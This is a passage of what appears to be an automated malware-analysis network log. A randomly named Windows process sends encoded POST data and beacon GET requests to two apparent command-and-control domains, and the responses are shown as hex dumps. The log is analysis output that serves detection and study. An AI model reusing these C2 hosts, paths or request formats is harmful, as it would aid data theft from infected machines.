May 30, 2024 15:02:55.689260006 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 May 2024 13:02:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
May 30, 2024 15:02:55.689290047 CEST	1236	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-05-30 13:02:55.507170308 +0000 UTC m=+1485
May 30, 2024 15:02:55.689301968 CEST	1236	IN	Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-A
May 30, 2024 15:02:55.689315081 CEST	1236	IN	Data Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cook
May 30, 2024 15:02:55.689327002 CEST	1018	IN	Data Raw: 9b 71 be 1b 8f c6 f9 ed 65 84 c8 80 c2 ce e8 8e 1b b7 59 24 ba ce 42 17 9d a1 95 5c 3e 6b 89 a8 3b 32 5c f1 c2 0a c7 5f 30 7e b9 15 0e f6 b1 19 2a 6d 5a ea 52 c6 1d 2f cf ac 1d 97 bc 6b b4 0a 75 f2 cb a4 50 4b 62 b8 c4 4e 53 36 ed 0c af b8 2b 9b Data Ascii: qeY$B\>k;2\_0~*mZR/kuPKbNS6+XB\WB4X$mvyY[;%Rj#j^'bd{:Z$]HMBnT/lVh$,vvX kW`7^<0_kp.rt~.)%qQrG
May 30, 2024 15:02:55.689985037 CEST	1236	IN	Data Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42 Data Ascii: ]H^c>rr)Eg\|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D\|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~3
May 30, 2024 15:02:55.689996958 CEST	1236	IN	Data Raw: 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef e5 fc 9b 0d ad cd 5c da 53 52 fc 12 Data Ascii: zi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd&Te]:[$N~\|XR(_
May 30, 2024 15:02:55.690007925 CEST	1191	IN	Data Raw: 46 a7 49 d9 e4 f4 21 12 b8 26 de 33 d6 33 7d c8 a7 db db ae 9b ca 38 a6 a0 d8 7b 09 3b c9 57 0e a6 2f b4 a5 04 79 dd 07 41 a3 e1 45 54 4e d8 29 07 3b 21 ef 12 7e ad 05 f8 ad 15 1f 4c 3e 35 d7 67 5c 42 0e 44 d1 ec db df 1c 2b 4b 06 1e 9e 1a c7 bc Data Ascii: FI!&33}8{;W/yAETN);!~L>5g\BD+K2t\|.u$1T-d#ZXObs?b $z>d,M(Y40bHgsm8R\I*u:{^H6&\|,>Iy&Fuaa/RJR'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49731	54.179.173.60	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:57.244148970 CEST	1770	OUT	POST /3h10/ HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.againbeautywhiteskin.asia Referer: http://www.againbeautywhiteskin.asia/3h10/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 77 6b 78 72 55 39 6e 53 42 66 4f 4b 49 53 30 59 70 64 4d 72 77 34 70 33 2f 2f 68 53 75 46 33 62 50 4e 65 5a 48 78 45 54 59 76 73 74 6f 49 65 43 6b 42 39 52 68 72 31 55 39 48 4f 45 43 67 35 4f 4f 77 76 67 52 34 65 32 58 5a 4a 70 64 68 35 36 45 70 37 75 49 78 56 43 4d 74 51 7a 4f 6f 36 31 71 2b 59 68 49 56 72 67 48 53 2b 49 50 39 45 64 33 2f 57 64 33 54 47 42 6d 38 55 4b 50 4a 39 44 36 79 6d 58 68 69 53 30 34 74 6b 53 76 52 77 64 4f 66 62 77 66 77 44 45 51 72 31 70 4d 63 51 6f 77 31 31 46 63 4e 56 51 43 52 63 59 63 56 48 4f 4c 62 2f 78 5a 65 56 74 5a 2f 2b 57 6f 41 73 35 30 52 6e 4d 38 62 7a 70 72 33 50 69 62 78 57 58 72 6b 4f 69 63 74 36 52 64 6f 72 70 5a 33 45 53 50 56 48 47 78 6f 41 6b 4c 65 65 61 47 71 36 54 50 63 36 63 4f 4a 37 39 59 53 61 2b 63 63 75 6b 41 36 61 74 6d 4d 43 6e 45 7a 66 69 34 61 6b 78 4a 46 65 56 57 39 30 35 54 34 72 68 4b 6b 79 6d 4a 73 53 56 4d 66 52 52 74 68 48 6e 66 6f 4d 4c 41 47 66 77 69 37 4d 63 2f 55 73 68 4c 63 63 43 4c 6b 58 73 59 41 77 6b 5a 6c 77 [TRUNCATED] Data Ascii: I2ID3h=wkxrU9nSBfOKIS0YpdMrw4p3//hSuF3bPNeZHxETYvstoIeCkB9Rhr1U9HOECg5OOwvgR4e2XZJpdh56Ep7uIxVCMtQzOo61q+YhIVrgHS+IP9Ed3/Wd3TGBm8UKPJ9D6ymXhiS04tkSvRwdOfbwfwDEQr1pMcQow11FcNVQCRcYcVHOLb/xZeVtZ/+WoAs50RnM8bzpr3PibxWXrkOict6RdorpZ3ESPVHGxoAkLeeaGq6TPc6cOJ79YSa+ccukA6atmMCnEzfi4akxJFeVW905T4rhKkymJsSVMfRRthHnfoMLAGfwi7Mc/UshLccCLkXsYAwkZlwRTCVvFi1KwNQ8g4k8hLsKZaAX5t/VLgyZf8Ihs/7P1QFtEefbF8Cc69pUsN+/a/A1S3qAULyQM15UYYIrHkUBlOWzpjLaYIo+R4IwIQbhbwWArMU+S6aRCbbzBhItcB8f/kwNiWFA11+jj11ow+a512KbyNbNHCZUD6iwm1ffmQJf9FXLvPrGnxqlLDn0uCYLhrhrgQroOUW5kSnCndOSXDJGIL+OHCN1d+1DdR52Y+gSe1T+UKupiRLCaLUSbKU7CWTFcnYOstUlmZ4i7uHLJgCQ5+QZTqB7Z03zGCE6vwssa8/+X0qnpGBGB8Xoeqx6EzWEwjMjI22utQU/FREy+Y2Vlg3mwOXlFMiiZWdd6bkIPjne1fKxHS+Xb2o2RMnxb4sFRhQXJYedgc4I+zOZIpM0/C07FqF5I01tMrTKrHBQ6wEQdt3pn/hFgt7nJSaesDhJKddn1V8ysaDGGok/6HPgrHB8ifWHWHKKlMW+uFVTX+EYkhbkZYyXGraOXQdrDsTY3OGuybsx1P45nkHmQ59/BBCMjjIbEbuTDS6/irWD2FsTcZep2NWMviKOJFsFyD40HvcEsNdDovqnKVsB/sl/p8EEuv8z6OiwzPoyfisH9IWr5hcbxS7DMSoeAEG6KmNtV6hdVR9rht60InqEkY1ofpHpbPU0E [TRUNCATED]
May 30, 2024 15:02:58.211244106 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 May 2024 13:02:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
May 30, 2024 15:02:58.211292982 CEST	224	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-05-30 13:02:58.02725535
May 30, 2024 15:02:58.211328030 CEST	1236	IN	Data Raw: 34 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 34 38 35 39 36 38 2e 35 33 36 36 36 36 31 33 30 22 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 38 20 4d 61 79 20 32 30 33 34 20 31 33 3a 30 32 3a 35 38 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b Data Ascii: 4 +0000 UTC m=+1485968.536666130"; Expires=Sun, 28 May 2034 13:02:58 GMTSet-Cookie: LADI_CLIENT_ID=59f07323-4e37-421e-461d-9067dee5f369; Expires=Sun, 28 May 2034 13:02:58 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/3h10; Expires=Sun, 28 May 203
May 30, 2024 15:02:58.211363077 CEST	1236	IN	Data Raw: 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 Data Ascii: ; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cook
May 30, 2024 15:02:58.211399078 CEST	570	IN	Data Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVI
May 30, 2024 15:02:58.211819887 CEST	1236	IN	Data Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
May 30, 2024 15:02:58.211879015 CEST	1236	IN	Data Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25 Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^\|9Vkn~WaO+P"SHmM:{\|[KuXM}j;h6aRz;FEP:uHqp-v1NG%61@pEk$F
May 30, 2024 15:02:58.211889982 CEST	1236	IN	Data Raw: 5d 1e 60 fa 46 a8 6c ae 83 f7 89 cb a6 03 d7 d4 3c d8 ae 1b 2c e4 a0 07 8a cb b0 d3 56 0a bb a6 ae 07 3f c0 12 3c 90 6b f7 07 9f 7c a0 b5 35 d0 3a 9c 23 6d 2b 35 a2 b6 fd 7e ff 43 e5 fb 17 1f 63 b4 a1 c7 e2 c4 b2 f1 22 9b 3a 02 b3 d4 5c ff c8 5d Data Ascii: ]`Fl<,V?<k\|5:#m+5~Cc":\]6'iVSmzo=}Wz>O7#bl}JiGmrPbZsS;C]^Vw\=,pE2Tb&,i<#)7h\Or$j&exXG
May 30, 2024 15:02:58.211900949 CEST	1236	IN	Data Raw: 77 5c 46 da f9 b2 ef e8 10 6f 7d ae 54 b0 b6 f4 3c 51 9c 3b ee 8b cb f2 79 a7 b8 31 6a 0d a0 86 3c 26 83 de 27 9d 82 43 31 64 4a d1 0f 50 33 a6 96 10 cb 31 cb 56 9c 47 87 47 39 66 6a 93 44 71 1c 34 d5 92 b3 79 96 7e c3 ba 4a e7 f7 ac 24 fb 6a d0 Data Ascii: w\Fo}T<Q;y1j<&'C1dJP31VGG9fjDq4y~J$jx[YKxHK,M1Ys/.sRGe$&9(R(+m!l0{G0Lq@~1nmS;7oS=l%1?JX6B
May 30, 2024 15:02:58.211910009 CEST	216	IN	Data Raw: de 89 e7 2e ba 03 21 41 d9 bf 45 3e fd b4 cc 20 a8 2d 0e 2a 64 99 2c 23 7f 74 93 29 b5 44 fb 19 c2 44 d2 39 70 bc bd 23 21 ec d0 02 42 b8 95 70 87 67 c9 2d 24 fe fc fa 29 b2 f3 57 6c c1 ab ac 84 d5 a3 c7 db 4d a6 81 69 f6 6b 65 d5 d3 65 25 09 30 Data Ascii: .!AE> -d,#t)DD9p#!Bpg-$)WlMikee%0+O\RGX%gUoi ]]{{{{^?hw%1}eY<I4(tWaga0b0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49732	54.179.173.60	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:59.772898912 CEST	451	OUT	GET /3h10/?I2ID3h=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtBRN5P/YRXsr4vMZ6FVLxfHeIGNVk4/Pc6j/1s70JI4NHtA==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:03:00.714371920 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 May 2024 13:03:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
May 30, 2024 15:03:00.714412928 CEST	224	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-05-30 13:03:00.54283405
May 30, 2024 15:03:00.714518070 CEST	1236	IN	Data Raw: 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 34 38 35 39 37 31 2e 30 35 32 32 34 34 37 39 33 22 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 38 20 4d 61 79 20 32 30 33 34 20 31 33 3a 30 33 3a 30 30 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 Data Ascii: +0000 UTC m=+1485971.052244793"; Expires=Sun, 28 May 2034 13:03:00 GMTSet-Cookie: LADI_CLIENT_ID=eddb60c9-9958-43ea-5c40-fe5005dc5bb3; Expires=Sun, 28 May 2034 13:03:00 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/3h10; Expires=Sun, 28 May 2034
May 30, 2024 15:03:00.714621067 CEST	1236	IN	Data Raw: 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 Data Ascii: Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cooki
May 30, 2024 15:03:00.714632988 CEST	1236	IN	Data Raw: 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f Data Ascii: ax-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIO
May 30, 2024 15:03:00.714644909 CEST	1236	IN	Data Raw: 28 22 6d 65 74 61 22 29 3b 64 6f 63 56 69 65 77 70 6f 72 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 20 22 76 69 65 77 70 6f 72 74 22 29 3b 64 6f 63 56 69 65 77 70 6f 72 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 Data Ascii: ("meta");docViewport.setAttribute("id", "viewport");docViewport.setAttribute("name", "viewport");docViewport.setAttribute("content", content);document.head.appendChild(docViewport);})();</script><meta property="og:title" content="404" /><meta
May 30, 2024 15:03:00.714665890 CEST	1236	IN	Data Raw: 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 6d 6d 61 72 79 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 65 78 74 61 72 65 61 2c 74 66 6f 6f 74 2c 74 68 2c 74 68 65 61 64 2c 74 69 6d 65 2c 74 72 2c 74 74 Data Ascii: an,strike,strong,sub,summary,sup,table,tbody,td,textarea,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;outline:0;font-size:100%;font:inherit;vertical-align:baseline;box-sizing:border-box;-webkit-font-smoothing:antialiase
May 30, 2024 15:03:00.714678049 CEST	1236	IN	Data Raw: 70 78 20 31 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 Data Ascii: px 15px;font-weight:600;font-size:16px;border-top-left-radius:10px;border-top-right-radius:10px}.ladipage-message .ladipage-message-box p{font-size:14px;padding:0 20px;margin-top:10px;line-height:18px;-webkit-line-clamp:3;-webkit-box-orient:ve
May 30, 2024 15:03:00.714692116 CEST	1236	IN	Data Raw: 30 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 6c 61 64 69 2d 65 6c 65 6d 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6c 61 64 69 2d 6f 76 65 72 6c 61 79 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 Data Ascii: 0 auto;height:100%}.ladi-element{position:absolute}.ladi-overlay{position:absolute;content:'';display:block;top:0;left:0;height:100%;width:100%;pointer-events:none}.ladi-app{position:absolute;width:100%;height:100%}.ladi-carousel{position:abso
May 30, 2024 15:03:00.714704990 CEST	1236	IN	Data Raw: 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 2d 69 74 65 6d 2e 6e 65 78 74 2c 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d Data Ascii: llery .ladi-gallery-view>.ladi-gallery-view-item.next,.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.selected.right{left:0;transform:translate3d(100%,0,0)}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.prev,.ladi-gallery .l
May 30, 2024 15:03:00.719690084 CEST	1236	IN	Data Raw: 75 74 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 74 6f 70 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e Data Ascii: ute;overflow:hidden}.ladi-gallery.ladi-gallery-top .ladi-gallery-view{width:100%}.ladi-gallery.ladi-gallery-top .ladi-gallery-control{top:0;width:100%}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-view{top:0;width:100%}.ladi-gallery.ladi-gal

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49733	162.0.213.94	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:03:14.076658964 CEST	694	OUT	POST /e20q/ HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.lenovest.xyz Referer: http://www.lenovest.xyz/e20q/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 53 5a 75 75 4c 47 69 49 65 68 67 2f 39 57 73 30 7a 56 33 46 2f 4f 6b 49 62 7a 51 68 54 6d 34 42 61 38 6b 4f 63 72 72 61 56 42 6d 72 30 6e 47 70 49 5a 4f 38 4d 66 48 54 5a 55 6a 32 33 59 31 33 65 76 4a 72 64 71 57 54 61 34 72 64 56 6d 70 49 4e 64 61 46 57 4c 69 76 52 46 4b 49 44 77 37 4d 6c 49 57 43 51 6a 6b 66 34 43 53 5a 61 6d 63 62 65 61 70 52 6c 39 30 4a 6a 42 36 59 52 67 68 64 35 4e 6d 75 77 38 64 42 36 43 75 46 48 38 48 43 53 68 58 37 50 4c 43 33 43 53 43 32 77 77 44 66 35 46 76 33 7a 39 32 53 59 55 6f 4f 43 33 47 76 65 6c 49 62 2b 33 53 48 42 59 45 3d Data Ascii: I2ID3h=bNDCugX1nXGLSZuuLGiIehg/9Ws0zV3F/OkIbzQhTm4Ba8kOcrraVBmr0nGpIZO8MfHTZUj23Y13evJrdqWTa4rdVmpINdaFWLivRFKIDw7MlIWCQjkf4CSZamcbeapRl90JjB6YRghd5Nmuw8dB6CuFH8HCShX7PLC3CSC2wwDf5Fv3z92SYUoOC3GvelIb+3SHBYE=
